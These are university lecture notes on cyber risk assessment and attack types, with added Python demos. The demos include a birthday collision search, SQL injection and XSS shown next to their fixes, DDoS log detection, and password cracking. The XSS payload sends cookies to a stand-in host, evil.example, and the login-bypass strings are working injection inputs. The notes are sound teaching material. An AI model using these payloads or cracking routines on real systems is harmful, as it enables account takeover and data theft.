
Technical University of Mombasa

Session 5: Cyber Security Risks and Vulnerabilities


Session Objectives
- Basics of risk management
- Operational threat environments
- Classes of attacks

5.1 Introduction
Recall
A vulnerability is a weakness that can be exploited to cause loss. New vulnerabilities are
discovered continuously; common discovery techniques include vulnerability scans and
penetration tests. Organizations must know which cybersecurity assets they have and where
those assets reside, both physically and logically. Code or a procedure that takes advantage
of a vulnerability is called an exploit.

Risk management means looking at what could go wrong and then deciding how to prevent,
or at least minimize, those potential problems. It encompasses three processes: risk
assessment, risk mitigation and evaluation.

We all carry out informal risk management numerous times in the course of a day
without even realizing it:
Every time we cross a street, we stop to weigh the risk of rushing in front of
oncoming traffic, waiting for the light to change, using the crosswalk, etc. Our ability
to analyze the consequences of each decision is risk assessment. What we decide to do
after performing that quick analysis is risk mitigation based on proper early training
and our experience of crossing a road. We may decide to wait for the traffic light and
use the crosswalk, which greatly reduces the potential risk; we may follow someone
else across the street allowing them to make the decision for us, or we may simply
choose not to cross the street. These decisions are a result of our risk assessment of the
situation. If you make it across the street you remember what worked. If anything
went wrong such as a honked horn or brakes squealing, you should evaluate if another
choice would have been better.

Below are important definitions for terms that are used in this topic.

Risk: The probability of suffering harm or loss. It refers to an action, event or a natural
occurrence that could cause an undesirable outcome, resulting in a negative impact or
consequence.

Risk Assessment: The process of identifying threats to information or information
systems, determining the likelihood of occurrence of the threat, and identifying system
vulnerabilities that could be exploited by the threat.
Risk Management: The process of taking actions to assess risks and avoid or reduce
risk to acceptable levels.

As a manager the issues of risk assessment may seem difficult and the right decisions
for risk management challenging; but the principles remain the same. It is your
responsibility to make the best decision based on the information at hand. A well-
structured risk management methodology, when used effectively, can help.

This is an ongoing process of evaluating threats and vulnerabilities, and then
establishing an appropriate risk management program as part of your larger
organization’s risk management program to mitigate potential monetary losses and
harm to an organization's reputation.
For information security, the program should be appropriate for the degree of risk
associated with the organization's systems, networks, and information assets. For
example, organizations accepting online payments are exposed to more risk than
websites with only static information.

5.2 Risk Assessment

Risk assessment is the process of identifying threats to information or information systems;
determining the likelihood of occurrence of the threat, and identifying system
vulnerabilities that could be exploited by the threat.

Risk assessment is the first phase in the risk management process. Risk is assessed by
identifying threats and vulnerabilities, and then determining the likelihood and
impact for each risk.

RISK ASSESSMENT ORIENTATIONS

Orientation      Description
Asset            Assets are identified first, and then potential threats to those assets are
                 analyzed. Vulnerabilities are identified that may be exploited to access the asset.
Threat           Potential threats are determined first, and then threat scenarios are
                 developed. Based on the scenarios, the vulnerabilities and assets of interest
                 to the adversary are determined in relation to the threat.
Vulnerability    Vulnerabilities and deficiencies are identified first, then the exposed
                 assets and potential threat events are determined.

It is important to designate an individual or a team, who understands the
organization’s mission, to periodically assess and manage information security risk.
The designated individual will work with others from the organization to understand
the business program component of information assets, the technology involved, and
the impact as well as the costs of managing the risk.
Risk assessment involves:

i. Classify information
Before an organization can assess risk it must first classify the information
assets in the organization. Classification is the designation given to information
from a defined category on the basis of its sensitivity. Information assets include
all categories of information (automated and non-automated), including (but not
limited to) data contained in records, files, and databases. Information assets
usually include: public records, mission-critical systems, customer interfaces,
internal tools, source code, and confidential records. The organization is
responsible for protecting the confidentiality, integrity and availability of the
information assets. The value of an asset will be determined by the information
owner - an individual or a group of individuals responsible for making
classification and control decisions regarding use of information, especially PPSI.

ii. Identify threats

A threat is a force, organization or person that seeks to gain access to, or
compromise, information. By looking at the nature of the threat and its capability and
resources, one can assess it and then determine its likelihood of occurrence, which is
the risk assessment step. A threat can thus be assessed in terms of the probability of an attack.

There are many types of information security threats; some examples are listed
below:
• Internal (e.g., malicious or unaware employees);
• Mobile (e.g., attackers who steal remote systems which, in turn, provide access
to information);
• Physical (e.g., attackers who steal computers or enter server rooms, file
cabinets, or offices);
• Natural (e.g., fire, floods, and earthquakes resulting in electrical outages,
equipment and hardware failures);
• Network (e.g., attackers who try to compromise systems exposed on a public
network or try to spoof or imitate remote systems);
• Social (e.g., attackers who try to fool employees into revealing information
through phishing);
• Malicious (e.g., viruses, worms, and Trojan horses, code that may damage,
reveal, or capture information).

It is important to be aware of threats to your organization’s information in order to
prevent compromise to that information’s confidentiality, integrity and availability.
Information security threats must be identified at as many levels as possible.

iii. Identify vulnerabilities

Vulnerabilities are weaknesses in a system or facility holding information which can be
exploited to gain access or violate system integrity.
Vulnerabilities can be assessed in terms of the means by which an attack would be
successful, such as:
• Tapes lost during transfer to a storage facility (availability issue; also a
confidentiality issue if the tapes are not encrypted).
• Information read by an unauthorized individual(s) (confidentiality issue).
• Software and hardware not maintained at current patch levels, allowing
unauthorized access via the Internet and resulting in a breach of confidential
information (confidentiality, integrity and/or availability issues).
• Unintentional loss of data via theft resulting in identity theft (confidentiality
issue).
• Accidental or intentional deletion or modification of information (availability
and integrity issues).
• Unsecured computers and portable devices such as BlackBerry handsets, laptops, or
USB devices (confidentiality, integrity and availability issues).

iv. Analyse The Risk To Information Assets

There are inherent risks involved in storing and transferring information.
Information is subject to intentional and unintentional actions by other people or
systems. If information is confidential, there may be unauthorized people who want
to see it, such as competitors or disgruntled or curious employees. People may try
to break into the devices containing the information or try to intercept the
information during transfer. People may also receive confidential information
unknowingly and completely by accident. Furthermore, information systems can
be maliciously or accidentally damaged. Information security breaches like these
can seriously hurt an organization.

Risk for a given asset can be expressed in its most general form using the following
equation:

Risk = (Probability of a threat occurring against an asset) x (Value of asset)

In other words, the higher the likelihood of a threat occurring and affecting an asset,
and the higher the value of that asset, the higher the risk. If a threat has little or no
chance of occurring, or if the asset has no value, the risk is either very low or zero.
In quantitative risk analysis the same product appears as annualized loss
expectancy: the expected loss from one incident (single loss expectancy) multiplied
by the expected number of incidents per year (annualized rate of occurrence).
Since information assets within an organization most likely hold some level of
value, risk management will involve reducing the likelihood of threats occurring,
or reducing the loss suffered when they do.

v. Select A Method
In order to quantify risk in some fashion, an organization will need to develop a
method of measuring risk so that this information can be communicated with others.
There are many methodologies to pick from; each organization will need to determine
which is best. Ultimately, the organization will need to understand its information
security risks. The question “What information assets are most at risk to compromise
or damage and what can happen to these assets?” needs to be answered.

The question may best be answered by assigning a value and an acceptable risk level to
each asset. The value of an asset varies from asset to asset and from organization to
organization. The level of risk depends on actions taken by the organization. For
example, if backups are done and secured, the loss (unavailability) of an electronic
copy may be a low risk. One way that you might measure risk is shown in the
following illustration; although presented as a methodology, it can be modified to meet
your needs. We will expand this illustration later in this document.
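The following is an added example written for these notes (it is not the illustration the notes refer to, and not code from the original document). It applies the Risk = probability x value formula from iv. on two ordinal 1 to 5 scales, shows how residual risk changes once controls are in place, and includes the quantitative form (annualized loss expectancy). The assets, scales, control effects and strategy cut-offs are all assumptions made for the example.

```python
"""Added example (not from the notes): a small qualitative risk register.

Applies Risk = P(threat) x Value(asset) on two ordinal 1..5 scales, shows
residual risk after controls, and the quantitative form ALE = SLE x ARO.
The assets, scales, control effects and strategy cut-offs are assumptions.
"""
from dataclasses import dataclass

# Assumed ordinal scales: 1 = lowest, 5 = highest.
LIKELIHOOD = {"rare": 1, "unlikely": 2, "possible": 3, "likely": 4, "almost certain": 5}
VALUE = {"negligible": 1, "minor": 2, "moderate": 3, "major": 4, "critical": 5}


@dataclass(frozen=True)
class Risk:
    asset: str
    threat: str
    likelihood: str      # key into LIKELIHOOD
    value: str           # key into VALUE: what is lost if the threat succeeds
    # Each control: (name, likelihood steps it removes, value steps it removes).
    # Preventive controls cut likelihood; backups, encryption and insurance
    # cut the loss (value) instead, which a likelihood-only model would miss.
    controls: tuple = ()


def inherent_score(r: Risk) -> int:
    """Risk before any control, on a 1..25 scale."""
    return LIKELIHOOD[r.likelihood] * VALUE[r.value]


def residual_score(r: Risk) -> int:
    """Risk that remains after the listed controls are in place."""
    likelihood = max(1, LIKELIHOOD[r.likelihood] - sum(c[1] for c in r.controls))
    value = max(1, VALUE[r.value] - sum(c[2] for c in r.controls))
    return likelihood * value


def handling_strategy(score: int, appetite: int = 6) -> str:
    """Map a score onto the handling strategies of 5.3.
    Cut-offs are assumed: >= 20 is a 'total calamity', <= appetite is 'low-loss'."""
    if score >= 20:
        return "avoid or transfer"
    if score <= appetite:
        return "retain"
    return "reduce, then retain or transfer what remains"


def rank_register(register):
    """Highest residual risk first, which is where the next control budget goes."""
    return sorted(register, key=residual_score, reverse=True)


def annualized_loss_expectancy(single_loss_expectancy: float, annual_rate: float) -> float:
    """Quantitative form of the same product: ALE = SLE x ARO."""
    return single_loss_expectancy * annual_rate


# Constructed register for an organization that takes online payments.
REGISTER = (
    Risk("customer database", "SQL injection from the Internet", "likely", "critical",
         controls=(("parameterized queries", 2, 0), ("web application firewall", 1, 0))),
    Risk("payment server", "ransomware", "likely", "critical",
         controls=(("patching and endpoint detection", 1, 0), ("offline backups", 0, 2))),
    Risk("public website (static content)", "defacement", "possible", "minor"),
    Risk("backup tapes in transit", "loss or theft", "unlikely", "major",
         controls=(("tape encryption", 0, 2),)),
)

if __name__ == "__main__":
    for r in rank_register(REGISTER):
        s = residual_score(r)
        print(f"{r.asset:32} inherent={inherent_score(r):2} residual={s:2} -> {handling_strategy(s)}")
    # A breach costing 250,000 expected once every four years.
    print("ALE:", annualized_loss_expectancy(250_000, 0.25))
```

Note how the same inherent score (20 for both the database and the payment server) leads to different residual scores depending on the controls, and how the ranking by residual score, not by inherent score, is what should drive where the next control is bought.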

To assist the organization in making information security risk assessment decisions it
will help to ask some questions based on confidentiality, integrity and availability.
Additional resource information is found at the end of this document.

vi. Summarise and Communicate Risk

Risk has to be measured for each information asset, and for the organization as a
whole, and then communicated so decisions can be made to manage the risk.

Benefits of Risk analysis

Risk analysis provides the following benefits:
• Improve awareness: Discussing issues of security can raise the general level of
interest and concern among employees.
• Identify assets, vulnerabilities and controls:
- Some companies may be unaware of their computing assets and the
vulnerabilities associated with those assets; a systematic analysis produces a
comprehensive list of assets and vulnerabilities.
• Improve basis for decisions:
- Controls reduce productivity through increased overhead and inconvenience
to users.
- Some controls cannot be justified from the perspective of the protection they
provide. Also, some risks are so serious that they warrant a continuing search
for more effective controls. Thus, the seriousness of the risk affects the
desirability of controls.
• Justify expenditures for security: Some security mechanisms or controls are
very expensive without an obvious benefit.
- A risk analysis can help identify instances that are worth the expense of a major
security mechanism.

5.3 Risk Mitigation / Handling

Risk handling is the application of controls and countermeasures appropriate to the
risk, subject to constraints such as available funds.
Risk handling strategies include the following:
• Risk Avoidance: Can the risk be avoided? This may mean siting IT systems
away from obviously dangerous/insecure areas, deciding against
centralization of IT resources, telecommuting, etc.
• Risk Retention: The risk retention strategy is applied only where the
organization feels that it can bear the expected losses. This is applied to
risks that have been identified as having low associated costs.
• Risk Reduction: Risk reduction is the policy of introducing controls and
countermeasures to reduce the likelihood of occurrence, or to reduce the losses
that will result from a violation of security.
• Risk Transfer: This strategy passes the costs resulting from a violation
of security to a third party (insurance policies, maintenance contracts, standby
agreements, etc.)

Below is a summary of the severity of risk and the corresponding risk handling approach:

Threat severity       Risk handling strategy
Total calamities      Risk avoidance; risk transfer
Low-loss threats      Risk retention
Others                Risk retention; risk transfer

5.4 Cyber Threat Environment

The cyber threat environment consists of:
a) Cyber Threat
A cyber threat is an activity intended to compromise the security of an information
system by altering the availability, integrity, or confidentiality of a system or the
information it contains.
The cyber threat environment is the online space where cyber threat actors conduct
malicious cyber threat activity.

b) Cyber Threat Actors

Cyber threat actors are states, groups, or individuals who, with malicious intent, aim
to take advantage of vulnerabilities, low cyber security awareness, and technological
developments to gain unauthorized access to information systems in order to access
or otherwise affect victims’ data, devices, systems, and networks. The globalized
nature of the Internet allows these threat actors to be physically located anywhere in
the world and still affect the security of information systems in Kenya.

c) Motivations
Cyber threat actors can be categorized by their motivations and, to a degree, by their
sophistication. Threat actors value access to devices, processing power, computing
resources, and information for different reasons. In general, each type of cyber threat
actor has a primary motivation.

d) Sophistication
Cyber threat actors are not equal in terms of capability and sophistication, and have a
range of resources, training, and support for their activities. Cyber threat actors may
operate on their own or as part of a larger organization (i.e., a nation-state intelligence
program or organized crime group). Sometimes, even sophisticated actors use less
sophisticated and readily available tools and techniques because these can still be
effective for a given task and/or make it difficult for defenders to attribute the activity.

Nation-states are frequently the most sophisticated threat actors, with dedicated
resources and personnel, and extensive planning and coordination.

Cybercriminals are generally understood to have moderate sophistication in
comparison to nation-states. Nonetheless, they still have planning and support
functions in addition to specialized technical capabilities that affect a large number of
victims.

Threat actors in the top tier of sophistication and skill, capable of using advanced
techniques to conduct complex and protracted campaigns in the pursuit of their
strategic goals, are often called advanced persistent threats (APT).
This designator is usually reserved for nation-states or very proficient organized crime
groups.

Hacktivists, terrorist groups, and thrill-seekers are typically at the lowest level of
sophistication as they often rely on widely available tools that require little technical
skill to deploy. Their actions, more often than not, have no lasting effect on their
targets beyond reputation.

Insider threats are individuals working within their organization who are particularly
dangerous because of their access to internal networks that are protected by security
perimeters. Access is a key component for malicious threat actors, and having
privileged access eliminates the need to employ other remote means. Insider threats
may be associated with any of the other listed types of threat actors, but can also
include disgruntled employees with motive.

e) Cyber Threat Activities

Cyber threat actors conduct malicious cyber threat activity by exploiting technical
vulnerabilities, employing social engineering techniques, or by manipulating social
media. A determined and capable adversary will often carefully select the technique
most likely to result in successful exploitation after conducting reconnaissance against
their target and may use a range of techniques to achieve their goal. The majority of
threat actors, however, simply cast a wide net in hopes of exploiting any unsecure
network or database.

Technical vulnerabilities are weaknesses or flaws in the design, implementation,
operation, or management of an information technology system, device, or service
that provide access to cyber threat actors. For example, a threat actor may attempt to
install malicious software, called malware, or take advantage of existing flaws to
exploit the targeted system. In addition to installing malware, threat actors also use
tools that directly exploit specific technical vulnerabilities.

Social engineering
Exploitation methods that target human vulnerabilities, such as carelessness and trust,
are collectively known as social engineering. Threat actors use social engineering to
trick an individual into inadvertently allowing access to a system, network, or device.
Phishing and spear-phishing are common social engineering techniques (see 5.5
Types of Cyber Attacks, the cyber threat toolbox, for more information).
Cyber threat actors can also manipulate social media in order to influence public
discourse. With a thorough understanding of how traditional media and social media
work – and how individuals consume information – cyber threat actors can promote
their message to broader target audiences at a relatively low cost.
They can do this by masquerading as legitimate information providers, hijacking
social media accounts, or creating websites and new accounts.

Attribution
Attribution is the act of accurately determining the threat actor responsible for a
particular set of activities. Successful attribution of a cyber threat actor is important
for a number of reasons, including network defence, law enforcement, deterrence, and
foreign relations. Cyber threat actors attempt to evade attribution through obfuscation.

Obfuscation
Obfuscation refers to the tools and techniques that threat actors use to hide their
identities, goals, techniques, and even their victims. In order to avoid leaving clues
that defenders could use to attribute the activity, threat actors can use either common,
readily available tools and techniques or custom-built tools that covertly send
information over the Internet.

False flags
Sophisticated threat actors can also use false flags, whereby an actor mimics the
known activities of other actors with the hope of causing defenders to falsely attribute
the activity to someone else. For example, a nation-state could use a tool believed to
be used extensively by cybercriminals.

The ability of cyber threat actors to successfully obfuscate their actions varies
according to their level of sophistication and motivation. In general, more
sophisticated actors, such as nation-states and competent cybercriminals, will be more
adept at – and have more reasons for – obfuscation and will be more successful in
avoiding attribution than less sophisticated threat actors.

5.5 Types of Cyber Attacks

Also known as THE CYBER THREAT TOOLBOX

It is beyond the scope of these lesson notes to present all cyber capabilities that threat
actors could deploy. Below is a non-exhaustive list of common tools and techniques
that are used by threat actors. For simplicity, they are listed alphabetically and are not
ranked according to frequency or impact.

Adware
Adware is short for advertising software and its main objective is to generate revenue
by delivering tailored online advertisements. As such, browser-based and application-
based adware tracks and gathers user and device information, including location data.
Adware can lead to exploitation of security settings, users, and systems. Malware,
man-in-the-middle, and spyware are often associated with this tool.

Backdoor
A backdoor is a point of entry into a user’s system or computer, bypassing
authentication measures, encryption, or intrusion detection systems. Once threat
actors have this remote access, they can steal information, install malware, or control
the device’s processes and procedures. Backdoors are often deliberately created for
troubleshooting, software updates, or system maintenance. Threat actors can use
these legitimate backdoors for malicious purposes.

Birthday attack
Birthday attacks are made against the hash algorithms used to verify the integrity
of a message, software or digital signature. A message processed by a hash function
produces a message digest (MD) of fixed length, independent of the length of the input
message; the MD acts as a fingerprint of the message. Because the digest is fixed
length while messages are not, distinct messages with the same MD (collisions) must
exist; a hash is considered secure only if finding one is computationally infeasible.
The birthday attack exploits the probability of finding two messages that generate
the same MD: for an n-bit digest, an attacker who hashes many candidate messages
expects a collision after roughly 2^(n/2) evaluations, not the 2^n that searching for a
message matching one given digest would need. In practice the attacker prepares many
harmless-looking variants of a benign message and many variants of a malicious one,
finds a benign/malicious pair with the same MD, gets the benign one signed, and then
substitutes the malicious one; the receiver cannot detect the replacement even by
comparing MDs, because they match.
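The search described above, as an added example that is not part of the notes: SHA-256 truncated to a small number of bits stands in for a weak hash, so the collision appears within seconds, and the two "payment instruction" message templates are constructed for the example. Only an invisible reference number varies between variants, which is what lets the attacker present the benign text for signing and swap in the malicious one later.

```python
"""Added example (not from the notes): a birthday search for a collision.

SHA-256 truncated to `bits` bits stands in for a weak hash. The attacker
prepares variants of a benign message and variants of a malicious one
(varying only a reference number) and looks for a cross pair with equal
digests. The payment messages are constructed for this example.
"""
import hashlib
import math


def truncated_digest(msg: bytes, bits: int) -> int:
    """Leading `bits` bits of SHA-256(msg) as an integer (1 <= bits <= 256)."""
    full = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    return full >> (256 - bits)


def collision_probability(n: int, bits: int) -> float:
    """Birthday bound: P(some pair collides among n random digests)
    ~ 1 - exp(-n(n-1) / 2^(bits+1))."""
    return 1.0 - math.exp(-n * (n - 1) / 2.0 ** (bits + 1))


def expected_trials(bits: int) -> float:
    """Expected digests computed before the first collision, ~ sqrt(pi/2 * 2^bits),
    i.e. on the order of 2^(bits/2) rather than 2^bits."""
    return math.sqrt(math.pi / 2 * 2.0 ** bits)


def find_cross_collision(bits: int, limit: int = 1 << 16):
    """Return (benign, malicious) with equal truncated digests, or None.

    Keeps one dictionary per side; a digest already seen on the other side
    is a usable pair: get `benign` signed, then substitute `malicious`.
    """
    benign_seen = {}     # digest -> benign message
    malicious_seen = {}  # digest -> malicious message
    for i in range(limit):
        benign = b"Pay 100 KES to Alice. ref=" + str(i).encode()
        malicious = b"Pay 100000 KES to Mallory. ref=" + str(i).encode()

        d = truncated_digest(benign, bits)
        if d in malicious_seen:
            return benign, malicious_seen[d]
        benign_seen[d] = benign

        d = truncated_digest(malicious, bits)
        if d in benign_seen:
            return benign_seen[d], malicious
        malicious_seen[d] = malicious
    return None


if __name__ == "__main__":
    bits = 24
    print(f"{bits}-bit digest: expect ~{expected_trials(bits):.0f} hashes, "
          f"P(collision after 4096) = {collision_probability(4096, bits):.2f}")
    pair = find_cross_collision(bits)
    if pair:
        benign, malicious = pair
        print(benign, malicious, hex(truncated_digest(benign, bits)), sep="\n")
```

With a 24-bit digest the pair turns up after a few thousand hashes on each side, as the 2^(n/2) estimate predicts; the full 256-bit SHA-256 digests of the two messages still differ, which is the whole reason digest length matters.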

Bots and Botnets

A bot, also known as a zombie, is an Internet-connected device (e.g., computers,
mobile, and Internet of Things devices) that is infected with malware without the
owner’s awareness and is remotely controlled by a threat actor to perform a specific
malicious task. A botnet is a grouping of these compromised devices that are
coordinated by a threat actor.

Botnets typically expand by scanning the online environment and finding vulnerable
devices that can provide computing power and additional capacity. Botnets are used
for a multitude of purposes, such as to conduct distributed denial of service (DDoS),
spread ransomware and malware, conduct ad fraud campaigns, send spam, divert
traffic, steal data, and manipulate, amplify, and/or suppress social media and web
platform content in order to impact public discourse.

Code Injection
Code injection is when threat actors introduce malicious code into a computer
program by taking advantage of a flaw in the way the program handles or interprets
input, so that data supplied by the attacker is treated as code: as part of an SQL
statement, as script in a web page, or as a command passed to the operating system.
Two common code injection techniques are cross-site scripting (XSS) and Structured
Query Language (SQL) injection. The general defence is to keep data and code
separate, for example with parameterized queries and context-aware output encoding.
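Both techniques side by side with their fixes, as an added example that is not from the notes. It uses Python's built-in sqlite3 module so it runs offline; the users table, the two payloads and the HTML fragment are constructed for the example, and passwords are stored in clear only to keep it short (real systems store salted, slow hashes).

```python
"""Added example (not from the notes): SQL injection and XSS, vulnerable
and fixed forms. The users table and payloads are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built SQL: the attacker's input is parsed as part of the statement."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterized SQL: input travels as data and is never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def greeting_vulnerable(display_name: str) -> str:
    """Reflected XSS: untrusted text is pasted straight into HTML."""
    return f"<p>Welcome, {display_name}!</p>"


def greeting_safe(display_name: str) -> str:
    """Output encoding for the HTML text context: the browser renders the
    characters instead of executing them."""
    return f"<p>Welcome, {html.escape(display_name)}!</p>"


SQLI_USERNAME = "alice' --"          # comment marker removes the password check
SQLI_PASSWORD = "' OR '1'='1"         # tautology matches every row
XSS_PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment:   ", login_vulnerable(db, SQLI_USERNAME, "wrong"))
    print("vulnerable, tautology: ", login_vulnerable(db, "x", SQLI_PASSWORD))
    print("parameterized:         ", login_safe(db, SQLI_USERNAME, "wrong"))
    print(greeting_vulnerable(XSS_PAYLOAD))
    print(greeting_safe(XSS_PAYLOAD))
```

The vulnerable login returns the admin row for a password that is wrong, because the quote in the input closes the string literal and the rest of the input becomes SQL. The parameterized version sends the same bytes as a bound value, so they can only ever be compared with the column, never executed.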

Cryptomining
Cryptomining or cryptocurrency mining is when software programs use
computing resources to generate or “mine” a cryptocurrency, an activity that rewards
the miner with a small fraction of the mined cryptocurrency as a fee for the mining
service. Cryptojacking is when a threat actor covertly exploits a victim’s device (e.g.,
computers, mobile, and Internet of Things devices) for the unauthorized mining of
cryptocurrency. In order to increase efficiency (and thus revenue) a threat actor can
use a botnet of compromised devices. Such malware is typically delivered by
visiting a compromised website, installing an application, or through phishing.

(Distributed) Denial of Service

Denial of service (DoS) is a technique by which a threat actor attempts to
disrupt the normal activities of a specific host (e.g., website, server, network,
Internet of Things device) by overwhelming it with Internet traffic (requests). The
overall objective is to render the host unavailable for legitimate requests from users
and render the targeted system dysfunctional. Distributed denial of service (DDoS)
adds a level of complexity by introducing traffic flooding from multiple sources (e.g.,
from a botnet). This larger-scale activity makes it much harder to stop and very
difficult to distinguish legitimate user traffic from malicious traffic.

[Figure: Distributed denial of service]
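The difference between a single-source flood and a distributed one shows up directly in web server logs, and the following added example (not part of the notes) runs two simple detectors over constructed access-log lines in Common Log Format. A per-source rate rule catches the single flooder, but says nothing about thirty bots sending two requests each; only comparing the total volume of a time window against a baseline reveals that. The IP addresses, timestamps and thresholds are all constructed assumptions.

```python
"""Added example (not from the notes): finding a flood in access logs.

The log lines are constructed in Common Log Format. Two detectors:
per-source rate, which catches a single-origin DoS, and aggregate rate
against a baseline, which is what reveals a distributed flood where each
bot sends only a couple of requests. Thresholds are assumed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Return (ip, timestamp, request, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, _ = m.groups()
    return ip, datetime.strptime(ts, TIME_FMT), request, int(status)


def window_start(ts: datetime, window: int) -> str:
    """Label (HH:MM:SS, UTC) of the fixed window, `window` seconds wide, containing ts."""
    start = int(ts.timestamp()) // window * window
    return datetime.fromtimestamp(start, timezone.utc).strftime("%H:%M:%S")


def per_source_alerts(records, window=10, max_per_window=20):
    """Source IPs that exceed max_per_window requests in any one window."""
    counts = Counter((ip, window_start(ts, window)) for ip, ts, _, _ in records)
    return sorted({ip for (ip, _), n in counts.items() if n > max_per_window})


def volumetric_alerts(records, window=10, baseline=5, factor=5):
    """Windows whose total traffic exceeds factor x the normal baseline.
    Returns {window label: (requests, distinct sources)}; many sources with
    few requests each is the DDoS signature a per-source rule never sees."""
    totals = Counter(window_start(ts, window) for _, ts, _, _ in records)
    sources = defaultdict(set)
    for ip, ts, _, _ in records:
        sources[window_start(ts, window)].add(ip)
    return {w: (n, len(sources[w])) for w, n in totals.items() if n > baseline * factor}


def make_log():
    """Constructed traffic: two normal clients, one flooder, then 30 bots."""
    base = datetime(2024, 3, 1, 9, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, path="/"):
        ts = (base + timedelta(seconds=offset)).strftime(TIME_FMT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'

    lines = []
    for t in range(0, 60, 10):                        # normal: one request / 10 s each
        lines += [line("198.51.100.7", t), line("198.51.100.8", t, "/about")]
    for t in range(20, 25):                           # single-source flood: 8 req/s for 5 s
        lines += [line("203.0.113.5", t, "/search?q=x") for _ in range(8)]
    for bot in range(100, 130):                       # distributed: 30 bots, 2 requests each
        lines += [line(f"203.0.113.{bot}", 40), line(f"203.0.113.{bot}", 41)]
    return lines


if __name__ == "__main__":
    records = [r for r in map(parse_line, make_log()) if r]
    print("single-source flood from:", per_source_alerts(records))
    for w, (n, srcs) in sorted(volumetric_alerts(records).items()):
        print(f"{w}: {n} requests from {srcs} sources")
```

The 09:00:40 window is flagged only by the volumetric rule: 62 requests from 32 distinct addresses, none of which individually crosses the per-source limit. That is the practical meaning of the sentence above about the difficulty of telling legitimate from malicious traffic: once the attacker spreads the load, the per-request view looks normal and only the aggregate does not.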

Drive-By Exploit and Watering Hole

A drive-by exploit refers to malicious code that a cyber threat actor has placed on a
website without the website host’s knowledge; the malicious code attempts to
compromise the devices of any user who visits the website. A watering hole is a
website frequented by individuals specifically targeted by a cyber threat actor, which
the actor compromises with an exploit.

Exploits and Exploit Kits

An exploit is malicious code that takes advantage of an unpatched vulnerability. An
exploit kit is a collection of multiple exploits that affect unsecure software
applications. Each exploit kit is customized to search for specific vulnerabilities and
execute the corresponding exploit for the vulnerability it finds. If a user visits a website
hosting an exploit kit, the exploit kit will test its repository of exploits against the
software applications on the user’s device and deploy the exploit that fits the user’s
vulnerability.

Man-In-The-Middle
Man-in-the-middle (MITM) is a technique by which a threat actor intercepts a
communication between two parties, such as a victim and a web server, without the
victim’s knowledge. The victim is under the illusion that they are communicating
directly and securely with a website.
MITM enables threat actors to monitor communications, reroute traffic, alter
information, deliver malware, and acquire personally identifiable or other sensitive
information. MITM can be achieved via several techniques such as phishing,
pharming, typo-squatting, Wi-Fi eavesdropping, and SSL hijacking.

Password Cracking

Password cracking is an attempt to recover account passwords and so gain direct access
to accounts. Two common forms of password cracking are brute force and dictionary-based.
Brute-force cracking systematically tries every possible combination of characters up to
some length, so its cost grows exponentially with password length and alphabet size,
while dictionary-based cracking checks candidates from a list of commonly used
passwords and words, often with simple variations (capitalization, appended digits).
Both are usually run offline against stolen password hashes, which is why salted, slow
password hashing matters as much as password length.
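The two forms as an added example (not from the notes), run against unsalted SHA-256 hashes. The wordlist, mangling rules, target passwords and alphabet are constructed; the brute-force keyspace is deliberately tiny (three characters) so it finishes instantly, and keyspace_size shows why the same approach does not scale to real passwords. The last function shows the salted, slow hash a defender should store instead.

```python
"""Added example (not from the notes): dictionary and brute-force cracking
of unsalted SHA-256 password hashes, plus the slow salted hash a defender
should store instead. The hashes, wordlist and alphabet are constructed;
the keyspace is kept tiny so the brute force finishes instantly."""
import hashlib
import itertools
import string
from typing import Iterable, Optional

ALPHABET = string.ascii_lowercase + string.digits
WORDLIST = ["123456", "password", "qwerty", "hunter2", "letmein", "mombasa"]
# Mangling rules applied to each dictionary word (a subset of what real crackers do).
RULES = (
    lambda w: w,
    lambda w: w.capitalize(),
    lambda w: w + "1",
    lambda w: w + "123",
    lambda w: w.capitalize() + "123",
    lambda w: w + "!",
)


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def dictionary_attack(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each word under every rule; cost is |wordlist| x |RULES| hashes."""
    for word in wordlist:
        for rule in RULES:
            candidate = rule(word)
            if sha256_hex(candidate) == target:
                return candidate
    return None


def brute_force(target: str, alphabet: str, max_len: int) -> Optional[str]:
    """Exhaustive enumeration, shortest strings first; cost is keyspace_size()."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if sha256_hex(candidate) == target:
                return candidate
    return None


def keyspace_size(alphabet_len: int, max_len: int) -> int:
    """Number of candidates up to max_len: the sum of alphabet_len^n."""
    return sum(alphabet_len ** n for n in range(1, max_len + 1))


def slow_salted_hash(password: str, salt: bytes, iterations: int = 200_000) -> str:
    """What to store instead: PBKDF2-HMAC-SHA256. The same attacks still
    apply, but each guess costs `iterations` hashes and the per-user salt
    makes precomputed tables useless."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


if __name__ == "__main__":
    print(dictionary_attack(sha256_hex("Hunter2123"), WORDLIST))   # found via a rule
    print(brute_force(sha256_hex("z9q"), ALPHABET, 3))              # 36^3 keyspace
    print(keyspace_size(36, 3), "vs", keyspace_size(95, 12))        # why length matters
    print(slow_salted_hash("hunter2", b"per-user-salt")[:16])
```

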